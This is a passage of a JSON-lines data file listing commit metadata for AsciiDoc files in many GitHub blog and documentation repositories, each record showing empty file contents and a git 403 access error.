2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_file":"_posts\/2012-01-06-Configurer-son-acces-SVN-a-un-hebergement-OVH-pro-partie-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3161c393eb15fde3939e22922536eebad81e699f","subject":"fixed typo","message":"fixed typo\n","repos":"jakubjab\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain","old_file":"src\/docs\/arc42\/EN\/appendix-open_issues.adoc","new_file":"src\/docs\/arc42\/EN\/appendix-open_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4921b28d00cd4ce2b65c5572cab9e0d6b46d952","subject":"Update 2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","message":"Update 2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","repos":"anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io","old_file":"_posts\/2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","new_file":"_posts\/2015-06-13-Principal-Component-Analysis-PCA-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anuragsingh31\/anuragsingh31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a533f63d20473b3f7d2b7a048a8ec13f7942de73","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e009580357ad0e0d6242a172f2c9c0610251982b","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ccdfb6495e7d2e29c7646f45e5a141d677c832d","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a5b0e3aa98e4cb3414a4b972aa07d54b1de0654","subject":"RTGOV-570 Add Elasticsearch clustering information","message":"RTGOV-570 Add Elasticsearch clustering information\n","repos":"Governance\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov,Governance\/rtgov,jorgemoralespou\/rtgov,jorgemoralespou\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov,Governance\/rtgov,objectiser\/rtgov,djcoleman\/rtgov,djcoleman\/rtgov,Governance\/rtgov,objectiser\/rtgov,objectiser\/rtgov,jorgemoralespou\/rtgov","old_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_file":"docs\/userguide\/en-US\/UGInstallation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/objectiser\/rtgov.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"020138978eeb1e9f5ea6397abacd0242e8985cfa","subject":"Publish 2016-6-27-json-decode-json-encode.adoc","message":"Publish 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-json-decode-json-encode.adoc","new_file":"2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"383f2aba964c3dc746e71f2af60b669ff35e3ef1","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797936fd0c809d67294d1ffd08d3929e28b960f6","subject":"add README for AWS adapter","message":"add README for AWS adapter\n","repos":"olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function","old_file":"spring-cloud-function-adapters\/spring-cloud-function-adapter-aws\/README.adoc","new_file":"spring-cloud-function-adapters\/spring-cloud-function-adapter-aws\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olegz\/spring-cloud-function.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0842cfb30959fbc7bbf932777c7084e1fca2364d","subject":"Update 2015-04-14-HTML-Rundown.adoc","message":"Update 2015-04-14-HTML-Rundown.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-14-HTML-Rundown.adoc","new_file":"_posts\/2015-04-14-HTML-Rundown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f05c4f9443701258e6d84f4404c9fb3e358985f","subject":"Update 2016-04-28-Word-Press-1.adoc","message":"Update 2016-04-28-Word-Press-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_file":"_posts\/2016-04-28-Word-Press-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0d1c82abb75428058e7503ca9a49e845062b268","subject":"Update 2017-01-06-A-Small-Poem.adoc","message":"Update 2017-01-06-A-Small-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-06-A-Small-Poem.adoc","new_file":"_posts\/2017-01-06-A-Small-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f023ac92f8d64b99d2ccc8ad6910e0a0d00f3042","subject":"Update 2018-05-14-Useful-links.adoc","message":"Update 2018-05-14-Useful-links.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2018-05-14-Useful-links.adoc","new_file":"_posts\/2018-05-14-Useful-links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27b743fa17d22840358165bee56cb99caee43760","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"995b8d9f21f8fba8ad2bcf34ed6e56d86833cc57","subject":"y2b create post New 12\\","message":"y2b create post New 12\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-07-New-12.adoc","new_file":"_posts\/2015-05-07-New-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"696e707409fb29127e20de56281095bdd0d1271f","subject":"Update 2015-11-12-Titre2.adoc","message":"Update 2015-11-12-Titre2.adoc","repos":"victorcouste\/blog,victorcouste\/blog,victorcouste\/blog","old_file":"_posts\/2015-11-12-Titre2.adoc","new_file":"_posts\/2015-11-12-Titre2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/victorcouste\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2510d5f9c2762b6980968eebdb6e5730c640bab","subject":"Added travis build badge","message":"Added travis build badge\n","repos":"b-cuts\/transfuse,dbachelder\/transfuse,johncarl81\/transfuse","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dbachelder\/transfuse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e9c7d21efc5b1c3b4bed7e9cefb385890be62bf","subject":"Update 2016-09-27-Hedging-Factors.adoc","message":"Update 2016-09-27-Hedging-Factors.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-09-27-Hedging-Factors.adoc","new_file":"_posts\/2016-09-27-Hedging-Factors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattpearson\/mattpearson.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8ea96b31ffb6a4540e849b6da48785629a1fdbe","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d76113ad577d33a8310beceec5c4d7dcfaa40ea","subject":"Update 2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","message":"Update 2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecb0e5a51ebcbbb39662103a791e044ef4d5efa5","subject":"Update 2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","message":"Update 2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","repos":"olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io","old_file":"_posts\/2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","new_file":"_posts\/2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olavloite\/olavloite.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54cb893de2ae57524f244ee5e8af8ba04b1a6a16","subject":"Update 2016-11-07-Style-sheets.adoc","message":"Update 2016-11-07-Style-sheets.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-07-Style-sheets.adoc","new_file":"_posts\/2016-11-07-Style-sheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a9f31c51210885a71ad0e9586067f8186e74159","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0ffcefc4df7a598359d9d8649fab1204fbe8e68","subject":"Update 2015-10-20-homebrew_install_memo.adoc","message":"Update 2015-10-20-homebrew_install_memo.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-10-20-homebrew_install_memo.adoc","new_file":"_posts\/2015-10-20-homebrew_install_memo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e35b78cef2652a02d9ef0498f4246a1e0974432","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0da1d9af3b774b1c64c544a4a847ad101bd9d00","subject":"Update 2015-11-20-light-transport.adoc","message":"Update 2015-11-20-light-transport.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-11-20-light-transport.adoc","new_file":"_posts\/2015-11-20-light-transport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"144e905b40e18f1cc33a83b00dbc4b7d8780eaed","subject":"Update 2017-08-23-Your-Blog-title.adoc","message":"Update 2017-08-23-Your-Blog-title.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a70655f0a1899ca6d98193760c3af9d615bd122","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7734fc99875a049571f985d17f3e3aa45834f53b","subject":"Update 2017-06-13-Falhas-em-Prolog.adoc","message":"Update 2017-06-13-Falhas-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-13-Falhas-em-Prolog.adoc","new_file":"_posts\/2017-06-13-Falhas-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f5248b2679374a2d4750d0a1605e54cb6bbb50","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kwpale\/kwpale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17c5f58859d5b05b0a7cbc14751463fe44c3910a","subject":"Update 2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","message":"Update 2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","new_file":"_posts\/2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c5fd64c29dc7f268fdf2c3d30e582758fdf9936","subject":"Update 2015-03-07-Hello-World.adoc","message":"Update 2015-03-07-Hello-World.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2015-03-07-Hello-World.adoc","new_file":"_posts\/2015-03-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36819009bbd0daf261ba13406e88cdd30d531775","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49af64e18eb8957f9678d3cef51d29ec2fb2cde3","subject":"Update 2016-02-26-Gantt-Style.adoc","message":"Update 2016-02-26-Gantt-Style.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"922b6b85349e13bdd924b6b3fa7ec4870149c46f","subject":"Create SUMMARY..adoc","message":"Create SUMMARY..adoc","repos":"creocoder\/swagger2markup,izeye\/swagger2markup,Swagger2Markup\/swagger2markup,samxye\/swagger2markup,johanhammar\/swagger2markup,Relequestual\/swagger2markup","old_file":"SUMMARY..adoc","new_file":"SUMMARY..adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Relequestual\/swagger2markup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56c13ca7d0b33010225fe37914dbfd934735afdb","subject":"y2b create post iPhone 5s Fingerprint DEMO \\u0026 GUIDE (Apple Touch ID Test)","message":"y2b create post iPhone 5s Fingerprint DEMO \\u0026 GUIDE (Apple Touch ID Test)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5s-Fingerprint-DEMO-u0026-GUIDE-Apple-Touch-ID-Test.adoc","new_file":"_posts\/2013-09-20-iPhone-5s-Fingerprint-DEMO-u0026-GUIDE-Apple-Touch-ID-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"321b5a442c2edbe43a060117b77e5cb7c681b33d","subject":"add a change","message":"add a change\n","repos":"jbosschina\/openshift-cookbooks","old_file":"jboss\/datavirt\/cache-meta.adoc","new_file":"jboss\/datavirt\/cache-meta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"676151bd15abdf74bdbeb241099d543fbc38f37c","subject":"Adding release notes for release of revapi_reporter_file_base revapi_reporter_json revapi_reporter_text","message":"Adding release notes for release of revapi_reporter_file_base revapi_reporter_json revapi_reporter_text\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200727-reports-by-criticality.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200727-reports-by-criticality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d6d9e873c60d510fc036965dfe1e60d4520d0d1","subject":"Update 2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","message":"Update 2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","new_file":"_posts\/2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa4ecacf88fcfc68b03359529620e0b11286203","subject":"Remove unnecessary line","message":"Remove unnecessary line\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e7f02c09df3dc6e1877844fb29fa0f35da75de9a","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e80e955cf3c0eec4268d1657985667b7b14b03f7","subject":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0adee5e77e8ff400a5b1ba3e9b9d2181f93ee6fc","subject":"Update 2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","message":"Update 2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","new_file":"_posts\/2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"566130daf2a871c90d8981fbba4a469a059ccb50","subject":"v1.83 fix","message":"v1.83 